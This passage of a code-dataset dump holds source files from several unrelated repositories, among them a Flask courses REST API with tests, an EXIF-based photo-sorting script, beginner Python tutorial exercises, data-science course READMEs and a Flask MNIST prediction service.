FLASK_APP=courses_app`\n- run migrations `flask db upgrade`\n- run server `flask run`" }, { "alpha_fraction": 0.6640759706497192, "alphanum_fraction": 0.6692573428153992, "avg_line_length": 20.07272720336914, "blob_id": "01e5ea13ed02b7d3b8a4ad2a7ba4b4955508626e", "content_id": "7a328375184f18d68a3bae9f21a0ea0ea14fb8a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1158, "license_type": "no_license", "max_line_length": 119, "num_lines": 55, "path": "/tests/conftest.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "import os\nimport tempfile\nimport datetime\n\nimport pytest\n\nfrom courses_app import create_app\nfrom courses_app import settings\nfrom courses_app.models import db, Course\n\n\[email protected](scope=\"module\")\ndef app():\n    db_fd, db_path = tempfile.mkstemp()\n\n    class TestingConfig(settings.DevelopmentConfig):\n        SQLALCHEMY_DATABASE_URI = f\"sqlite:///{db_path}\"\n\n    app = create_app(TestingConfig)\n    yield app\n\n    os.close(db_fd)\n    os.unlink(db_path)\n\n\[email protected]\ndef database(app):\n    db.create_all()\n    yield db\n    db.drop_all()\n\n\[email protected]\ndef client(app):\n    return app.test_client()\n\n\ndef create_course(\n    name: str, starting_date: datetime.date = datetime.date.today(), duration_days: int = 10, lectures_count: int = 10 \n):\n    return Course(\n        name = name,\n        starting_date = starting_date,\n        ending_date = starting_date + datetime.timedelta(days=duration_days),\n        lectures_count = lectures_count\n    )\n\[email protected]\ndef courses(database):\n    courses = [\n        create_course(f'Course{i}', duration_days=i)\n        for i in range(1, 5)\n    ]\n    database.session.add_all(courses)\n    return 
courses" }, { "alpha_fraction": 0.6945606470108032, "alphanum_fraction": 0.6945606470108032, "avg_line_length": 25.55555534362793, "blob_id": "85d395b95092296bcc8637980b756ed79199f3c7", "content_id": "8038df05b21d5c9a36c79963171b0115f444656f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/courses_app/schemas.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "from marshmallow import Schema, fields\n\n\nclass CourseShema(Schema):\n id = fields.Integer(dump_only=True)\n name = fields.String()\n starting_date = fields.Date()\n ending_date = fields.Date()\n lectures_count = fields.Integer()\n" }, { "alpha_fraction": 0.6623853445053101, "alphanum_fraction": 0.6623853445053101, "avg_line_length": 19.185184478759766, "blob_id": "4e7b39619833a64dd11973ab2668894d7b4c77c1", "content_id": "8efa7e85c103af2e79b8b825d1acc5b3248b143d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 545, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/courses_app/__init__.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "from flask import Flask\n\nfrom courses_app import settings\nfrom courses_app.resources import api\n\n\ndef create_app(config_obj=None):\n app = Flask(__name__, static_folder=None)\n\n if not config_obj:\n app.logger.warning(\n \"No config specified; defaulting to development\"\n )\n config_obj = settings.DevelopmentConfig\n\n app.config.from_object(config_obj)\n\n from courses_app.models import db, migrate\n\n db.init_app(app)\n db.app = app\n\n migrate.init_app(app, db)\n\n api.init_app(app)\n\n return app\n" }, { "alpha_fraction": 0.616123616695404, "alphanum_fraction": 0.6190476417541504, "avg_line_length": 30.513158798217773, "blob_id": "8c9ca50f8e63e4ef8fccdfe959819c4cc1e804cc", "content_id": "53ce87a6dbf30fab46f5e9cfc2b0b857409d1a7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2394, "license_type": "no_license", "max_line_length": 106, "num_lines": 76, "path": "/courses_app/resources.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "import datetime\nfrom flask import request, abort\nfrom flask_restplus import Resource, Api, fields\nfrom webargs import fields as args_fields\nfrom webargs.flaskparser import use_kwargs\nfrom sqlalchemy import exc\n\nfrom courses_app.models import Course, db\nfrom courses_app.schemas import CourseShema\n\n\napi = Api(doc='/docs')\n\ncourse_fields = api.model('Course', {\n 'name': fields.String,\n \"starting_date\": fields.Date,\n \"ending_date\": fields.Date,\n 'lectures_count': fields.Integer,\n})\n\n\[email protected]('/courses')\[email protected]()\nclass CoursesList(Resource):\n\n @api.doc(params={'q': 'name or part of it', 'date': 'date'})\n @use_kwargs({'q': args_fields.String(), 'date': args_fields.Date()}, location='query')\n def get(self, q: str = None, date: datetime.date = None):\n courses_query = Course.query\n if q:\n courses_query = courses_query.filter(Course.name.contains(q)) \n if date:\n courses_query = courses_query.filter(Course.starting_date <= date, Course.ending_date >= date)\n courses = courses_query.all()\n return CourseShema(many=True, only=['id', 'name']).dump(courses)\n\n @api.expect(course_fields)\n def post(self):\n course_data = CourseShema().load(\n 
request.get_json()\n        )\n        course = Course(**course_data)\n        try:\n            db.session.add(course)\n            db.session.commit()\n        except exc.IntegrityError as e:\n            abort(400, description=f\"Course with name {course.name} already exists\")\n        return CourseShema().dump(course)\n\n\[email protected]('/courses/<int:id>')\[email protected](params={'id': 'Course id'})\nclass CoursesDetailed(Resource):\n    def _get_object(self, id: int) -> Course:\n        return Course.query.get(id)\n\n    def get(self, id: int):\n        course = self._get_object(id)\n        return CourseShema().dump(course)\n    \n    @api.expect(course_fields)\n    def put(self, id: int):\n        course_data = CourseShema(partial=True).load(\n            request.get_json()\n        )\n        course = self._get_object(id)\n        for key, value in course_data.items():\n            setattr(course, key, value)\n        db.session.commit()\n        return CourseShema().dump(course)\n    \n    def delete(self, id: int):\n        if Course.query.filter_by(id=id).delete() == 0:\n            abort(400, f'No course with id {id}')\n        db.session.commit()" } ]
8
tuvokki/console
https://github.com/tuvokki/console
a223f1ae7a449ec190b00412323d023a1c3856f0
418efb7743348210e878d397ab56fec9557e8cfb
bf7f2f6f773077d93887649584e2c5050db199a5
refs/heads/master
2020-04-06T07:03:04.118468
2018-03-26T14:57:38
2018-03-26T14:57:38
61,790,685
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5020845532417297, "alphanum_fraction": 0.5038713812828064, "avg_line_length": 31.288461685180664, "blob_id": "ea36cfd8ddc81c98d40444414ce39d74305bfbf8", "content_id": "602ff5970914b45f8112f65f520753e83fee4564", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1679, "license_type": "permissive", "max_line_length": 99, "num_lines": 52, "path": "/photo_cleaner.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport os.path\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nfrom datetime import datetime\nfrom shutil import copyfile\n\ndef get_exif(fn):\n ret = {}\n try:\n i = Image.open(fn)\n info = i._getexif()\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n ret[decoded] = value\n except Exception, e:\n print(\"on {} no exif data is found.\", fn)\n return ret\n\ndisk = '/Volumes/Slim/disk2/'\n# disk = \"/Users/wouter/tmp/test/\"\nrecupdirs = next(os.walk(disk))[1]\n# outdir = \"/Users/wouter/tmp/out/\"\noutdir = '/Volumes/Slim/photos2/'\n\nif not os.path.exists(outdir + \"nodate/\"):\n os.makedirs(outdir + \"nodate/\")\n\nprint \"-----------------------------------------------------------------------\"\nfor recupdir in recupdirs:\n for file in os.listdir(disk + recupdir):\n if file.endswith(\".jpg\"):\n src = disk + recupdir + \"/\" + file\n print(\"Reading: \" + src)\n exif_data = get_exif(src)\n try:\n date_object = datetime.strptime(exif_data['DateTimeOriginal'], '%Y:%m:%d %H:%M:%S')\n directory = date_object.strftime(outdir + \"%Y/%m/%d/\")\n newfile = date_object.strftime(\"%H-%M-%S.jpg\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n dst = directory + newfile\n except Exception, e:\n dst = outdir + \"nodate/\" + file\n\n print(\"Copy to: \" + dst)\n if not os.path.isfile(dst):\n copyfile(src, dst)\n\nprint \"-----------------------------------------------------------------------\"\n" }, { "alpha_fraction": 0.6958333253860474, "alphanum_fraction": 0.7083333134651184, "avg_line_length": 23, "blob_id": "2e57dfb78df3dcb44b99cc99c022b6621b6d4f83", "content_id": "5e2996786d15b608c2aca60930a6b115e2d84d74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "permissive", "max_line_length": 56, "num_lines": 10, "path": "/tmp/walk.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport pprint\n\nrecupdirs = next(os.walk('/Volumes/Slim/disk/'))[1]\npp = pprint.PrettyPrinter(indent=4)\n# pp.pprint(recupdirs)\nfor recupdir in next(os.walk('/Volumes/Slim/disk/'))[1]:\n pp.pprint(recupdir)\n" }, { "alpha_fraction": 0.6544715166091919, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 21.363636016845703, "blob_id": "40d2cceb5733f74c7aca43736715693815015294", "content_id": "b7e1b893bf8aaeddf6fe06681d2daf65b34b6971", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "permissive", "max_line_length": 60, "num_lines": 11, "path": "/tmp/count.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\noutdir = '/Volumes/Slim/photos/'\noutdir2 = '/Volumes/Slim/photos2/'\n\ncpt = sum([len(files) for r, d, files in os.walk(outdir)])\ncpt2 = sum([len(files) for r, d, files in os.walk(outdir2)])\n\nprint(cpt)\nprint(cpt2)\n" }, { "alpha_fraction": 0.75, 
"alphanum_fraction": 0.75, "avg_line_length": 16.600000381469727, "blob_id": "0e12c6cf637a17c645fbf48d25e9517fa06e0a3e", "content_id": "c1a9429999bf0dfe1f18293b369215b1231c04d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 264, "license_type": "permissive", "max_line_length": 70, "num_lines": 15, "path": "/Readme.md", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#Urwid tutorial and fun examples\n\n##Install\n\n`[sudo] apt-get install python-urwid`\n\nSee also https://github.com/urwid/urwid/wiki/Installation-instructions\n\n##run\n\n`python [tutorial].py`\n\n##More info\nhttp://urwid.org/tutorial/index.html\nhttp://urwid.org/index.html\n" }, { "alpha_fraction": 0.7137746214866638, "alphanum_fraction": 0.732856273651123, "avg_line_length": 38.02325439453125, "blob_id": "414d766101b602cd8c68e428e184307fa08cac5f", "content_id": "868379bce23dd55d48c838f5eb98d6c1a8573395", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1677, "license_type": "permissive", "max_line_length": 131, "num_lines": 43, "path": "/tmp/crstest.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# crstest.py\nimport curses\n\nstdscr = curses.initscr()\n\n# Usually curses applications turn off automatic echoing of keys to the screen, in order to be able to read keys and only display\n# them under certain circumstances. This requires calling the noecho() function.\ncurses.noecho()\n\n# Applications will also commonly need to react to keys instantly, without requiring the Enter key to be pressed; this is called\n# cbreak mode, as opposed to the usual buffered input mode.\ncurses.cbreak()\n\n# Terminals usually return special keys, such as the cursor keys or navigation keys such as Page Up and Home, as a multibyte\n# escape sequence. While you could write your application to expect such sequences and process them accordingly, curses can\n# do it for you, returning a special value such as curses.KEY_LEFT. To get curses to do the job, you'll have to enable keypad mode.\nstdscr.keypad(1)\n\nbegin_x = 20; begin_y = 7\nheight = 5; width = 40\nwin = curses.newwin(height, width, begin_y, begin_x)\n\npad = curses.newpad(100, 100)\n# These loops fill the pad with letters; this is\n# explained in the next section\nfor y in range(0, 100):\n for x in range(0, 100):\n try:\n pad.addch(y,x, ord('a') + (x*x+y*y) % 26)\n except curses.error:\n pass\n\n# Displays a section of the pad in the middle of the screen\npad.refresh(0,0, 5,5, 20,75)\n\n# Terminating a curses application is much easier than starting one. You'll need to call\ncurses.nocbreak(); stdscr.keypad(0); curses.echo()\n\n# to reverse the curses-friendly terminal settings. Then call the endwin() function to restore the terminal to its original\n# operating mode.\ncurses.endwin()" } ]
5
samlee916/Python-For-Beginners
https://github.com/samlee916/Python-For-Beginners
ee38950002954300e447e52c130a283b4c20258a
f6072393cb15cffd59973a06936b5a3fc4dc59df
e612fd1aecd6219626491d7452bb471b4ee33b48
refs/heads/master
2020-04-12T20:39:02.479574
2018-12-21T17:49:14
2018-12-21T17:49:14
162,742,765
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7312661409378052, "alphanum_fraction": 0.7312661409378052, "avg_line_length": 37.79999923706055, "blob_id": "c9dade1d099e300da87b06dbe2027ad1501e4358", "content_id": "ec34999ec277e57901088ee62122a186d380fab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 387, "license_type": "no_license", "max_line_length": 78, "num_lines": 10, "path": "/LogicalOperators.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example using logical operators\n\nmy_name = \"Tom\"\n\nif my_name == \"Hello\": #if statement implementation\n print(\"Tom\")#prints Tom if it meets the conditions of the if statement\nelif my_name == \"Tom\": #if else implementation\n print(\"Tom\")#prints Tom if it meets the conditions of the if statement\nelse:\n print(\"Hello\")#prints Hello if it meets the conditions of the if statement" }, { "alpha_fraction": 0.6753246784210205, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 30, "blob_id": "9f1347b5d3f9530641d15ef86b783d7d51e38e03", "content_id": "1522597c7b95868fda77707bc7eebfa82d829cff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 77, "num_lines": 5, "path": "/Input.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example using input\n\nmy_name = input(\"What is your name?: \")#user input\n\nprint(\"Hi, my name is \" + my_name + \".\")#prints out the result with the input" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6214285492897034, "avg_line_length": 22.33333396911621, "blob_id": "31b00f8a79e0c07a11b9f71bc6940e431a3398cf", "content_id": "b9c45d477e51c3db3a29677047e785bd1609de7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 50, "num_lines": 6, "path": "/Range.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of using the ranger operator in Python\n\nmy_list = [1,2,3,4,5,6,7,8,9,10]\n\nfor x in range(1,5): #prints 1,2,3,4\n print(x)\n" }, { "alpha_fraction": 0.7019230723381042, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 20, "blob_id": "529c0a5b9c158f8cdf16ef0a5b6534f68e9352e6", "content_id": "a19c7ad65a58925589bfa3f885cc7ae785a6264b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/MultiLineStrings.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of using strings in multiple ways\n\nanimal = \"dog\"\n\nprint(\"A %s ran over the hill.\" % animal)" }, { "alpha_fraction": 0.5939849615097046, "alphanum_fraction": 0.5939849615097046, "avg_line_length": 24.285715103149414, "blob_id": "e65f573c8c408310d025fcf261b51ae888eaf446", "content_id": "6ba0f13fcf03d4e361fd04851ac83b56ed01fe66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 87, "num_lines": 21, "path": "/ForLoops.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of for loops\n\nmy_string = \"this is a string\"\n\nfor char in my_string: \n print(char) #prints each character\n\na_string = \"this is my 
string\"\n\nfor g in a_string:\n if g == \"g\": #if there a g in the variable a_string\n print(\"G\")\n\nmy_fruits = [\"banana\", \"apple\", \"pear\"]\n\nfor f in my_fruits:\n print(\"I like to eat \" + f + \".\")#prints out the sentence for each item on the list\n\nfor f in my_fruits:\n if f == \"banana\": #checks if banana is in the list\n print(\"I like bananas.\") \n" }, { "alpha_fraction": 0.6841659545898438, "alphanum_fraction": 0.7078746557235718, "avg_line_length": 24.148935317993164, "blob_id": "1742e6dbd35d72dac651733250d7d8da4e077aa2", "content_id": "97ebf373f847e0a63b23b50d1af66ea9a6093987", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 82, "num_lines": 47, "path": "/Lists.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example about lists\n\nanother_list = []\n\nmy_list = [\"apple\", \"pear\", \"orange\", 1, another_list]\n\nprint(len(my_list))#prints out 5 since there are five elements in the list my_list\n\nmy_list1 = [\"apple\", \"pear\", \"orange\"]\n\nmy_list1.append(\"banana\")#adds banana to my_list1\n\nprint(my_list1)#prints out my_list1\n\nmy_list1.pop()#pops out banana\n\nprint(my_list1)#prints only the three items originally listed\n\nmy_list1.pop(0)#pops out the first item in the list\n\nprint(my_list1)\n\nmy_list2 = [\"apple\", \"pear\", \"orange\"]\n\nmy_fruit = my_list2[1]#stores pear in the variable\n\nprint(my_fruit)#prints out pear \n\nmy_list2.insert(0, \"banana\")#adds banana to item 0\n\nprint(my_list2)#prints out a list of four items\n\nmy_list2.remove(\"banana\")#removes banana from the list\n\nprint(my_list2)#prints out three items: apple, pear, and orange\n\nmy_list3 = [\"apple\", \"pear\", \"orange\"]\n\nmy_list3.extend([\"strawberry\", \"kiwi\", \"peach\"])#adds multiple items in the list\n\nprint(my_list3)#prints out six items\n\nnew_list = [\"apple\", \"pear\", \"orange\", \"strawberry\", \"kiwi\", \"peach\"]\n\nnew_list1 = new_list[0:2]#shows only the first two items in the list\n\nprint(new_list1)#prints the first two items in the list" }, { "alpha_fraction": 0.6256410479545593, "alphanum_fraction": 0.7230769395828247, "avg_line_length": 16.727272033691406, "blob_id": "45e66f91cf087c748dcd4774b5aed081d945d4f6", "content_id": "8b6318e0d5e0ced309a91c757371e356303bfe42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 195, "license_type": "no_license", "max_line_length": 50, "num_lines": 11, "path": "/Numbers.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of using numbers in Python\n\nprint(8*8)#prints out 64\n\nprint(8+8)#prints out 16\n\nprint(8/8)#prints out 1.0\n\nprint(8-8)#prints out 0\n\nprint(8%3)#prints out 2 because the remainder is 2\n" }, { "alpha_fraction": 0.7615384459495544, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 31.5, "blob_id": "984d93d5b558ee7901dd027ce67cfd11692b84ad", "content_id": "58ce7fa8246cfe676f246bd2393ab378c8a86b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 83, "num_lines": 8, "path": "/Functions.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example about using functions\n\ndef my_add_function(firstnumber, secondnumber):\n print(firstnumber + secondnumber)\n #a function that adds 
two numbers\n\nprint(\"Hello!\")\nmy_add_function(5,5)#calling the function and executing what is inside the function\n" }, { "alpha_fraction": 0.7450000047683716, "alphanum_fraction": 0.7450000047683716, "avg_line_length": 24.125, "blob_id": "ae621c775b1c6fb2176693372e49e5b13b2e99d1", "content_id": "666325e92b298dda9665149df54b617ad7c7d977", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/Strings.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example for strings\n\nfirst_variable = \"This is a first string. \"\nsecond_variable = \"This is the second string\"\n\ncombined_variable = first_variable + \" \" + second_variable\n\nprint(combined_variable)" }, { "alpha_fraction": 0.5688889026641846, "alphanum_fraction": 0.644444465637207, "avg_line_length": 23.77777862548828, "blob_id": "0eac655e98a5f3aaed6bb0aaacbce65bab308671", "content_id": "1fd6d4a59246b66540561bc32085d3148af22e39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 63, "num_lines": 9, "path": "/While.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example using a while loop\n\nmy_list = [1,2,3,4,5,6,7,8,9,10]\n\nstart_number = 0\n\nwhile start_number < 5:\n    print(my_list[start_number])#will print out numbers 1-5\n    start_number += 1#adding 1 to start_number\n\n\n" } ]
10
Jeromeschmidt/DS-2.3-Data-Science-in-Production
https://github.com/Jeromeschmidt/DS-2.3-Data-Science-in-Production
b5bcd1b5eefbb0f178a528bed52d49a7c6b935d9
fbfba72bd6b66b545d60b348f9c0a814a4e92657
a32d0b505d24462f94516f589164a567af1acb3e
refs/heads/master
2022-12-15T13:15:22.105179
2020-10-26T23:10:28
2020-10-26T23:10:28
237,717,370
0
0
MIT
2020-02-02T04:20:06
2020-10-26T23:10:31
2022-12-08T05:25:57
Jupyter Notebook
[ { "alpha_fraction": 0.7185792326927185, "alphanum_fraction": 0.7308743000030518, "avg_line_length": 21.84375, "blob_id": "296ddc9ba85fd7a1d5fe6d2268e552a9edf87395", "content_id": "6059496b9fd2fb364918955a046f883521b54da0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 732, "license_type": "permissive", "max_line_length": 104, "num_lines": 32, "path": "/Lessons/Advance_Visualization/D3_Flask/nasdaq-viz-master/README.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# nasdaq-viz\n\n## Description\nThis project aims to visualize the top 100 companies on the nasdaq stock exchange within a bubble chart.\n\n## Goals and Visions\n1. Learn d3\n2. Handle loading the nasdaq data both per request and from a file\n3. Store dataframes as pickle files\n\n## How to run\nThe first thing that you need to do when running this project is run these commands:\n```bash\npip install -r requirements.txt\nbower install\n```\nThis will get you all the dependencies that you need.\n\nTo run the app, you do: `python app.py`.\n\n## How to use\nTo run in production mode: `python app.py`\n\nTo run in debug mode: `python app.py debug`\n\n\n## Resources\n[d3.js](https://d3js.org)\n\n[bower](https://bower.io/)\n\n[flask](http://flask.pocoo.org/)\n\n" }, { "alpha_fraction": 0.4680851101875305, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 14.666666984558105, "blob_id": "0d4f558f5b9d94351c20ab424fd88ebd66b05abf", "content_id": "cdb97323a3094129ea1f1e1fd8a4970c6c48afb7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 423, "license_type": "permissive", "max_line_length": 24, "num_lines": 27, "path": "/Lessons/Advance_Visualization/Chartist_Flask/visualizing-diet-master/requirements.txt", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "astroid==2.2.5\nautopep8==1.4.3\nClick==7.0\nentrypoints==0.3\nflake8==3.7.7\nFlask==1.0.2\nisort==4.3.17\nitsdangerous==1.1.0\nJinja2==2.10.1\nlazy-object-proxy==1.3.1\nMarkdown==3.1\nMarkupSafe==1.1.1\nmccabe==0.6.1\nmdv==1.7.4\nnumpy==1.16.2\npandas==0.24.2\npycodestyle==2.5.0\npyflakes==2.1.1\nPygments==2.3.1\npylint==2.3.1\npython-dateutil==2.8.0\npytz==2019.1\nsix==1.12.0\ntabulate==0.8.3\ntyped-ast==1.3.1\nWerkzeug==0.15.2\nwrapt==1.11.1\n" }, { "alpha_fraction": 0.7543352842330933, "alphanum_fraction": 0.7697495222091675, "avg_line_length": 29.47058868408203, "blob_id": "410c082c133d46028eeb42a5b78bccc84f61df75", "content_id": "234665693d36e356fd9ccf79d0fde1f97f90233e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1038, "license_type": "permissive", "max_line_length": 102, "num_lines": 34, "path": "/Lessons/Advance_Visualization/Chartist_Flask/visualizing-diet-master/README.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Visualizing with chartist\n\n## Description\nThis project is dedicated towards demonstrating the use of plotting data dynamically with chartist.js.\nAll data is provided by a backend consisting of two routes:\n\n1. Index route for fetching the index page\n2. time series route for fetching the appropriate time series data\n\nThe backend is built and powered by flask & pandas. (python 3.7.3)\n\n## Goals and Visions\n1. 
To demonstrate using chartist.js for plotting data dynamically via a web application\n2. Connect my data science, Frontend web, and Backend web skills together.\n\n## How to run\nTo get started, download this repository and install all the pip requirements utilizing:\n```bash\npip install -r requirements.txt\n```\n\n```bash\npython3 time_series_pandas_flask.py\n```\n\nto run the server which will allow you to access the application on port 5000 in debug mode\nand port 3000 in production mode.\n\n## Resources\n[Chartist.js](https://gionkunz.github.io/chartist-js/)\n\n[Pandas](https://pandas.pydata.org/)\n\n[Flask](http://flask.pocoo.org/) \n\n" }, { "alpha_fraction": 0.7868338823318481, "alphanum_fraction": 0.7993730306625366, "avg_line_length": 38.875, "blob_id": "7792acaf659d2ed2e76c8ece75cfdc54176194a2", "content_id": "02b885dbfecd876a9f06190dac037eeaeb85c7cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 319, "license_type": "permissive", "max_line_length": 113, "num_lines": 8, "path": "/Lessons/AdvancePython.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Advance Python for DS\n\nPlease open the following Jupyter Notebook:\n\nhttps://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/advance_python.ipynb\n\nMap, Reduce and Filter:\nhttps://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/map_reduce.ipynb\n" }, { "alpha_fraction": 0.7708489894866943, "alphanum_fraction": 0.7903831601142883, "avg_line_length": 54.45833206176758, "blob_id": "643ed65fe8df100c0c35f0ef9c571000fdee2db2", "content_id": "6dc1f8cccf7e83c85f3af834260368bd7bc60c9f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1331, "license_type": "permissive", "max_line_length": 148, "num_lines": 24, "path": "/Lessons/BigData.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Big Data with PySpark\n\nIn part 1, we learn how to configure spark installation on local machine and how to configure master and slave for real-world applications.\nFor part 1, please check:\n<br/>\n1- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_on_local_machine.ipynb\n\n\n\nIn part 2, we array manipulation and how to do array processing similar to what we usually do in Pandas and Numpy.\nFor part 2, please check:\n<br/>\n1- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_array_manipulation_1.ipynb\n<br/>\n2- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_array_manipulation_2.ipynb\n<br/>\n3- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_numpy.ipynb\n<br/>\n4- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_pandas.ipynb\n\nIn part 3, we train a linear regression model in Pyspark on Advertising datasets.\nFor part 3, please check:\n<br/>\n1- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Linear_Reg_Pyspark.ipynb\n" }, { "alpha_fraction": 0.6378685832023621, "alphanum_fraction": 0.6528711915016174, "avg_line_length": 
31.21666717529297, "blob_id": "57d2e6126766134adffd0b142ac6f4a190c35ff4", "content_id": "664aaca30920a072b6af46e807c29884058c29ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1933, "license_type": "permissive", "max_line_length": 88, "num_lines": 60, "path": "/Docker_demo/DL_version/app.py", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Make a flask API for our DL Model\n\nimport tensorflow.keras as keras\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom flask_restplus import Api, Resource, fields\nfrom flask import Flask, request, jsonify\nimport numpy as np\nfrom werkzeug.datastructures import FileStorage\nfrom PIL import Image\nfrom keras.models import model_from_json\nimport tensorflow as tf\n\n\napp = Flask(__name__)\napi = Api(app, version='1.0', title='MNIST Classification', description='CNN for Mnist')\nns = api.namespace('Make_School', description='Methods')\n\nsingle_parser = api.parser()\nsingle_parser.add_argument('file', location='files',\n type=FileStorage, required=True)\n\nmodel = load_model('my_model.h5')\ngraph = tf.get_default_graph()\n\n# Model reconstruction from JSON file\n# with open('model_architecture.json', 'r') as f:\n# model = model_from_json(f.read())\n#\n# # Load weights into the new model\n# model.load_weights('model_weights.h5')\n\[email protected]('/prediction')\nclass CNNPrediction(Resource):\n \"\"\"Uploads your data to the CNN\"\"\"\n @api.doc(parser=single_parser, description='Upload an mnist image')\n def post(self):\n args = single_parser.parse_args()\n image_file = args.file\n image_file.save('milad.png')\n img = Image.open('milad.png')\n image_red = img.resize((28, 28))\n image = img_to_array(image_red)\n print(image.shape)\n x = image.reshape(1, 28, 28, 1)\n x = x/255\n # This is not good, because this code implies that the model will be\n # loaded each and every time a new request comes in.\n # model = load_model('my_model.h5')\n with 